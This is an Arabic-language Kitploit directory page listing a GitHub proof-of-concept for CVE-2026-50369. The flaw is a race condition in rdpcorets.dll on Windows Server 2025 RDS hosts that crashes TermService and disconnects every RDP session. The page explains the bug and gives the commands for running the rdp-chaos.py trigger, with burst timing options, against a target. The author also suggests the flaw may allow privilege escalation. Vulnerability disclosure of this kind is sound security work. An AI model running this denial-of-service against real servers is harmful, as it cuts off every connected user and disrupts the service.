Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-50369 — مُعيد إنتاج PoC لـ CVE-2026-50369، وهو حالة سباق TOCTOU في rdpcorets.dll على مضيفي جلسات RDS في Windows Server 2025 مما يؤدي إلى DoS في TermService عبر قطع جلسة RDP. | Kitploit
أدوات/GitHubGitHub/mofarthim/cve-2026-50369
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمر
GitHubmofarthim/cve-2026-50369

CVE-2026-50369

مُعيد إنتاج PoC لـ CVE-2026-50369، وهو حالة سباق TOCTOU في rdpcorets.dll على مضيفي جلسات RDS في Windows Server 2025 مما يؤدي إلى DoS في TermService عبر قطع جلسة RDP.

عرض المستودع
2منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-50369

مُعيد إنتاج لحالة سباق TOCTOU في rdpcorets.dll!CRdpPipeGfxPlugin::Enable على مضيفي جلسات RDS في Windows Server 2025.

أبلغتُ عن هذا كـ DoS؛ ويبدو أن مسار الكود يُمكّن أيضًا من EoP بطريقة ما. مُعيد الإنتاج هذا هو PoC لمسار DoS وحده.

الخلل

يقرأ Enable مؤشر واجهة COM عند this+0x60 مرتين دون مزامنة. تقوم TerminateInstance بمسح الحقل نفسه خارج نطاق القسم الحرج الخاص بها. يُنفَّذ كلاهما بشكل متزامن على مجموعة خيوط NT عبر عناصر عمل وصول وإزالة جهاز PnP. تؤدي القراءة الثانية إلى إلغاء مرجع فارغ → انتهاك الوصول → تعطل TermService → فصل جميع جلسات RDP النشطة.

root@kitploit:~
# install dependencies (Debian/Ubuntu)
sudo apt install -y freerdp3-x11 xvfb python3  # or freerdp2-x11

# create credentials file
echo -e "user1:pass1\nuser2:pass2\nuser3:pass3" > credentials.txt

# standard mode
python3 rdp-chaos.py --server <target> --creds credentials.txt

# burst mode (faster trigger)
python3 rdp-chaos.py --server <target> --creds credentials.txt \
    --burst --burst-count 16 --burst-kill-hold 0.1 --burst-race 0.030
تنزيل الأداة